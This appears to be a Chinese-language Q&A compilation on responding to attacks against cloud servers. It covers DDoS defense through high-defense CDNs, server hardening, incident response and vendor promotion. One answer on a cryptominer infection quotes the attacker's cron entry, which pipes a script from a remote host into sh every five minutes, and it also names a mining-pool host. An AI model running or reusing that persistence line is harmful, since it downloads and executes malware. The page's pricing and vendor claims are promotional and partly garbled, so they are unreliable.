阿里巴巴雲伺服器被攻擊了怎麼辦

⑴ 雲伺服器被攻擊怎麼解決

想避免 DDOS 攻擊 ，務必先搞清楚 ，當今銷售市場 99 %的DDOS攻擊是對於 IP 以百G攻擊流量導致網路伺服器宕機，以便做到攻擊目地 ，因而 你務必防止伺服器ip泄漏並掩藏 源ip ，那樣黑客就無法找到源伺服器ip ，也沒法使用ddos有效地攻擊你。

根據隱藏源伺服器 IP 的思路 ，我們可以給網站做一個高防CDN ，既可加速 ，又可以預防 被DDOS 攻擊 。高防CDN 能夠做到掩藏源伺服器目地 。當查詢 IP 時只能查詢 高防cdn的節點 ，而CDN 節點這般之多。 即便他人想攻擊你，也必須得一個個的IP 去打，這樣造成的攻擊成本自然就提高 ，對他們來說完全不劃算 ，而且還未必能找到 。當然不僅要做到 源IP不暴露 在防禦上也是就近機房清洗 ，回源速度快 ，絲毫不影響用戶體驗 ，不過值得一提的是不要把域名直接解析到源站IP ，也不要用源伺服器 IP 直接進行訪問 。
許多網站管理員都等網址被攻擊了才上高防cdn ，因此沒用，由於另一方早已記住了你的ip ，直接繞過高防CND節點 。根據源ip攻擊你，怎樣防禦 ？所以在接入防護之前一定要確定源IP 是干凈的，否者就要申請更換公網IP
因此，避免伺服器遭受ddos攻擊的最好是方式就是說 把高防CDN布置在好，不能讓另一方 了解 你的源伺服器ip ，即便 高防cdn 其中一個節點被打死 ，還可以立即切換到互聯 數據高防cdn備用節點 上。

⑵ 雲伺服器被攻擊，有哪些防護方式呢

雲技術的出現確實帶給了現代企業非常大的便利。但是與好處伴隨而來的，當然也有不願觸及的信息安全隱患。既然企業想要利用雲技術帶來的好處，那麼自然也要想辦法解決雲中安全隱患，降低企業面臨的風險。酷酷雲給您七個秘訣。
秘訣一：從基本做起，及時安裝系統補丁。不論是Windows還是Linux，任何操作系統都有漏洞，及時打上補丁避免漏洞被蓄意攻擊利用，是伺服器安全重要的保證之一。
秘訣二：安裝和設置防火牆。對伺服器安全而言，安裝防火牆非常必要。防火牆對於非法訪問具有很好的預防作用，但是安裝了防火牆並不等於伺服器安全了。在安裝防火牆之後，還需要根據自身的網路環境，對防火牆進行適當的配置以達到最好的防護效果。
秘訣三：安裝殺毒軟體。現在網路上的病毒非常猖獗，這就需要在網路伺服器上安裝網路版的殺毒軟體來控制病毒傳播。同時，在網路殺毒軟體的使用中，要定期或及時升級殺毒軟體，並且每天自動更新病毒庫。
秘訣四：關閉不需要的服務和埠。伺服器操作系統在安裝時，會啟動一些不需要的服務，這樣會佔用系統的資源，而且也會增加系統的安全隱患。對於一段時間內完全不會用到的伺服器，可以完全關閉；對於其間要使用的伺服器，也應該關閉不需要的服務，如Telnet等。另外，還要關掉沒有必要開的TCP埠。
秘訣五：定期對伺服器進行備份。為防止不能預料的系統故障或用戶不小心的非法操作，必須對系統進行安全備份。除了對全系統進行每月一次的備份外，還應對修改過的數據進行每周一次的備份。同時，應該將修改過的重要系統文件存放在不同伺服器上，以便出現系統崩潰時（通常是硬碟出錯），可以及時地將系統恢復到正常狀態
秘訣六：賬號和密碼保護。賬號和密碼保護可以說是伺服器系統的第一道防線，目前網上大部分對伺服器系統的攻擊都是從截獲或猜測密碼開始的。一旦黑客進入了系統，那麼前面的防衛措施幾乎就失去了作用，所以對伺服器系統管理員的賬號和密碼進行管理是保證系統安全非常重要的措施。
秘訣七：監測系統日誌。通過運行系統日誌程序，∞系統會記錄下所有用戶使用系統的情形，包括最近登錄時間、使用的賬號、進行的活動等。日誌程序會定期生成報表，通過對報表進行分析，就可以知道是否有異常現象。
從以上7個秘訣中，我們可以了解到伺服器安全防護的技巧，同時我們也了解了構成雲伺服器的安全問題。都說雲可能引發一場數據安全防護的變革，只要確保雲本身的安全，其大數據和處理效率高的特性讓傳統的IT安全防護等級提升了好幾倍，安全系數自然也會提高不少。
酷酷雲伺服器為您誠意解答，伺服器租戶的選擇，酷酷雲值得信賴。

⑶ 阿里雲伺服器被攻擊怎麼辦

分布式拒絕服務攻擊(DDOS)是目前常見的網路攻擊方法，它的英文全稱為Distributed Denial of Service?簡單來說，很多DoS攻擊源一起攻擊某台伺服器就形成了DDOS攻擊，從而成倍地提高拒絕服務攻擊的威力。

通常，攻擊者將攻擊程序通過代理程序安裝在網路上的各個「肉雞」上，代理程序收到指令時就發動攻擊。

隨著DDOS攻擊的成本越來越低，很多人就通過DDOS來實現對某個網站或某篇文章的「下線」功能，某篇文章可能因為內容質量好，在搜索引擎有較高的排名，但如果因為DDOS導致網站長時間無法訪問，搜索引擎則會將這篇文章從索引中刪除，網站的權重也會降低，因為達到了「下線」文章的目的。

對付DDOS不太容易，首先要找一個靠譜的主機供應商，我之前有個主機供應商，一發現某個IP被DDOS，就主動屏蔽這個IP好幾天，實際上就是硬體和技術能力不足的表現。

國外的主機供應商也未必靠譜，比如之前有次被DDOS，我就把博客轉到Dreamhost的空間，事實表明Dreamhost的防DDOS的能力不敢恭維，DDOS來了之後，Dreamhost對付DDOS倒是不客氣，直接把中國地區的IP全給屏蔽了。

一般來說，DDOS是需要花錢和帶寬的，解決DDOS也需要花錢和帶寬，那麼，如果伺服器被DDOS了，我們應該怎麼辦呢?

1、保證伺服器系統的安全

首先要確保伺服器軟體沒有任何漏洞，防止攻擊者入侵。確保伺服器採用最新系統，並打上安全補丁。在伺服器上刪除未使用的服務，關閉未使用的埠。對於伺服器上運行的網站，確保其打了最新的補丁，沒有安全漏洞。

2、隱藏伺服器的真實IP地址

不要把域名直接解析到伺服器的真實IP地址，不能讓伺服器真實IP泄漏，伺服器前端加CDN中轉(免費的CDN一般能防止5G左右的DDOS)，如果資金充裕的話，可以購買高防的盾機，用於隱藏伺服器真實IP，域名解析使用CDN的IP，所有解析的子域名都使用CDN的IP地址。此外，伺服器上部署的其他域名也不能使用真實IP解析，全部都使用CDN來解析。

總之，只要伺服器的真實IP不泄露，5G以下小流量DDOS的預防花不了多少錢，免費的CDN就可以應付得了。如果攻擊流量超過10G，那麼免費的CDN可能就頂不住了，需要購買一些高防的收費CDN，一般高防CDN比較貴，比如阿里雲騰訊雲的10G防護一個月就78千一年，目前國內性價比比較高的推薦：網路雲加速 ,10GDDOS防護套餐只需要1190一年，代理商買更便宜。相關鏈接

⑷ 伺服器被攻擊怎麼辦

1、發現伺服器被入侵，應立即關閉所有網站服務，暫停至少3小時。這時候很多站長朋友可能會想，不行呀，網站關閉幾個小時，那該損失多大啊，可是你想想，是一個可能被黑客修改的釣魚網站對客戶的損失大，還是一個關閉的網站呢?你可以先把網站暫時跳轉到一個單頁面，寫一些網站維護的的公告。
2、下載伺服器日誌，並且對伺服器進行全盤殺毒掃描。這將花費你將近1-2小時的時間，但是這是必須得做的事情，你必須確認黑客沒在伺服器上安裝後門木馬程序，同時分析系統日誌，看黑客是通過哪個網站，哪個漏洞入侵到伺服器來的。找到並確認攻擊源，並將黑客掛馬的網址和被篡改的黑頁面截圖保存下來，還有黑客可能留下的個人IP或者代理IP地址。
3、Windows系統打上最新的補丁，然後就是mysql或者sql資料庫補丁，還有php以及IIS，serv-u就更不用說了，經常出漏洞的東西，還有就是有些IDC們使用的虛擬主機管理軟體。
4、關閉刪除所有可疑的系統帳號，尤其是那些具有高許可權的系統賬戶!重新為所有網站目錄配置許可權，關閉可執行的目錄許可權，對圖片和非腳本目錄做無許可權處理。
5、完成以上步驟後，你需要把管理員賬戶密碼，以及資料庫管理密碼，特別是sql的sa密碼，還有mysql的root密碼，要知道，這些賬戶都是具有特殊許可權的，黑客可以通過他們得到系統許可權!
6、Web伺服器一般都是通過網站漏洞入侵的，你需要對網站程序進行檢查(配合上面的日誌分析)，對所有網站可以進行上傳、寫入shell的地方進行嚴格的檢查和處理。如果不能完全確認攻擊者通過哪些攻擊方式進行攻擊，那就重裝系統，徹底清除掉攻擊源。

⑸ 伺服器被攻擊怎麼辦

1、切斷網路

對伺服器所有的攻擊都來源於網路，因此，當伺服器遭受攻擊的時候，首先就要切斷網路，一方面能夠迅速切斷攻擊源，另一方面也能保護伺服器所在網路的其他主機。

2、查找攻擊源

要根據自身經驗和綜合判斷能力，通過分析系統日誌或登錄日誌文件，找出可疑信息，分析可疑程序。

3、分析入侵原因和途徑

一定要查清楚遭受攻擊的具體原因和途徑，有可能是系統漏洞或程序漏洞等多種原因造成的，只有找到問題根源，才能夠及時修復系統。

4、備份好用戶數據

當伺服器遭受攻擊的時候，就要立刻備份好用戶數據，同時也要注意這些數據是否存在攻擊源。如果其中有攻擊源的話，就要徹底刪除它，再將用戶數據備份到一個安全的地方。

5、重裝系統

這是最簡單也是最安全的辦法，已經遭受到攻擊的系統中的攻擊源是不可能徹底清除的，只有重裝系統才能夠徹底清除攻擊源。

6、修復程序或系統漏洞

如果已經發現了系統漏洞或程序漏洞之後，就要及時修復系統漏洞或修改程序bug。

7、恢復數據和連接網路

將已經備份好的數據重新復制到重裝好的系統中，隨後將伺服器開啟網路連接，恢復對外服務。

⑹ 阿里雲伺服器被挖礦了怎麼辦(純純電腦小白

1. 關閉訪問挖礦伺服器的訪問

iptables -A INPUT -s xmr.crypto-pool.fr -j DROP and iptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP.

2. chmod -x minerd ,取消掉執行許可權， 在沒有找到根源前，千萬不要刪除 minerd，因為刪除了，過一回會自動有生成一個。

3. pkill minerd ,殺掉進程

4. service stop crond 或者 crontab -r 刪除所有的執行計劃

5. 執行top，查看了一會，沒有再發現minerd 進程了。

6.檢查/var/spool/cron/目錄下發現有個root用戶的定時器文件。

下載腳本的語句：

*/5 * * * * curl -fsSL http://www.haveabitchin.com/pm.sh?0105010 | sh
病毒文件內容如下，感興趣的可以研究下：

View Code

解決minerd並不是最終的目的，主要是要查找問題根源，我的伺服器問題出在了redis服務了，黑客利用了redis的一個漏洞獲得了伺服器的訪問許可權，http://blog.jobbole.com/94518/然後就注入了病毒，下面是解決辦法和清除工作：

1. 修復 redis 的後門,

配置bind選項, 限定可以連接Redis伺服器的IP, 並修改redis的默認埠6379.
配置AUTH, 設置密碼, 密碼會以明文方式保存在redis配置文件中.
配置rename-command CONFIG 「RENAME_CONFIG」, 這樣即使存在未授權訪問, 也能夠給攻擊者使用config指令加大難度
好消息是Redis作者表示將會開發」real user」，區分普通用戶和admin許可權，普通用戶將會被禁止運行某些命令，如conf
2. 打開 ~/.ssh/authorized_keys, 刪除你不認識的賬號

3. 查看你的用戶列表，是不是有你不認識的用戶添加進來。 如果有就刪除掉.

⑺ 阿里雲伺服器被攻擊阿里雲會賠償

阿里會進行維護的。
賠償不能保證，如果對你產生了影響，你可以選擇申訴，但是一般沒啥用。

⑻ 雲伺服器被攻擊怎麼解決

當我們發現網站被攻擊的時候不要過度驚慌失措，先查看一下網站伺服器是不是被黑了，找出網站存在的黑鏈，然後做好網站的安全防禦，具體操作分為三步：
1）、開啟IP禁PING，可以防止被掃描。
2）、關閉不需要的埠。
3）、打開網站的防火牆。
這些是只能防簡單的攻擊。

⑼ 阿里雲ECS伺服器對外攻擊，怎麼解決

伺服器被黑了，保存數據，重做系統。伺服器

⑽ 伺服器一直被攻擊怎麼辦

香港阿里雲被流量攻擊了，一說到防禦攻擊，很多用戶可能會想到CDN、高防IP等防禦產品，這個思路是不錯的。但是香港阿里雲相對於國內的阿里雲而言，更多情況下是無法直接使用國內的CDN和高防IP來防禦的。大部分用戶在使用香港阿里雲時，都是沒有備案直接使用的，那麼在遇到攻擊時，也是沒法使用國內的高防節點來進行防禦的。那麼香港阿里雲遇到流量攻擊時應該怎麼處理？

並非屬於容易受攻擊的行業，攻擊流量較小時，我們可以優先採用升級伺服器防禦值的形式來進行防禦。那如果本身就是屬於極易受到攻擊的行業或者攻擊流量來勢兇猛的話。這種情況下，我們可以通過使用海外的高防節點來進行防護，海外高防CDN、海外高防IP都是不錯的選擇，並且在防禦價格上也並不一定會比國內的貴哦。

在增值防禦產品的選擇上怎麼選劃算？

1、直接找阿里雲處理

通過聯系阿里雲售後進行處理，售後技術人員會根據您的實際情況去推薦使用相應的雲端防護產品。

2、找專業做IDC安全防護的企業處理

通過聯系具備有IDC相關資質的網路安全公司來量身定製防禦方案，協助處理流量攻擊的問題。

那麼這兩種方式哪種更劃算呢？

單從價格上來說，大廠的雲端防護產品在價格上必然不會很低的，如果追求性價比的話，也可以選擇其他專業的規模中等的IDC公司來做雲端安全防護。規模小些的IDC公司在價格上是會有絕對性的優勢的，一般的流量攻擊都是可以通過策略定製幫您防住的。

很多用戶在面對攻擊來襲時都會有遇到一個情況，雖然我們使用了高防IP，但是還是無法有效的防禦住DDOS攻擊，其實主要的原因在於，DDOS流量攻擊的防禦值已經超過了伺服器本身的防禦閾值了，這種情況下肯定是無法防禦住的。今天小蟻君說說。

當然使用高防伺服器防不住，除了攻擊的確達到閾值外，我們還需要考慮的是，是否是因為我們所使用高防伺服器的防禦值並非是真實的防禦。如果您是通過正規的IDC運營商去租用的高防伺服器，一般都是真實的配置的，正規的企業也不會出租縮水的伺服器。這種情況下也許真的是因為攻擊流量達到閾值了。面對這種流量超過閾值的情況，一般情況下，客服會建議您更換防禦值更大的伺服器。其實我們也可以換台伺服器，也可以選擇在原有的伺服器基礎上增加防禦值。例如原先您的防禦是100G的，可以升級到200G。如果還是防不住，這種情況下，就沒必要在盲目的去升級防禦了。可以嘗試去找IDC供應商去做一個防禦策略，最好做一個可以包防住的套餐。當然這種包防住的價格是會很貴的。如果追求性價比的話，也是可以通過添加高防IP這類雲端防禦產品來進行防護的，效果也是特別好的。在價格上高防IP的價格高低不等，主要還是以防住的流量為計算標准來計費的。當然這個雲端防護產品種類的選擇范圍還是挺大的，你可以根據業務的實際情況來去進行相應的選擇哦